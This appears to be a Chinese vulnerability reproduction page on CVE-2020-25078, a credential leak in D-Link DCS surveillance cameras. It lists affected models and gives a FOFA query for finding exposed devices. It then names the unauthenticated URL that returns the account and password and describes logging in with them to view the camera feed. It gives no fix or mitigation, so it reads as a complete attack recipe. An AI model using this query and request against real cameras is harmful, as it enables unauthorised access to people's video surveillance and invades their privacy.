D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

漏洞描述

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面

漏洞影响

Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

 

FOFA

Note

app="D_Link-DCS-2530L"

D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

 

 

 

访问登录界面

D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

 

 

出现漏洞的 Url 为, 其中泄露了账号密码

 1 http://xxx.xxx.xxx.xxx/config/getuser?index=0 

D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

 

 使用泄露的账号密码登陆系统

D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

 

 

相关文章:

  • 2021-10-05
  • 2021-06-17
  • 2022-02-06
  • 2022-12-23
  • 2021-12-06
  • 2021-12-22
  • 2021-12-22
  • 2022-12-23
猜你喜欢
  • 2021-09-10
  • 2021-06-20
  • 2021-07-30
  • 2021-10-10
  • 2021-06-07
  • 2022-12-23
  • 2021-05-07
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode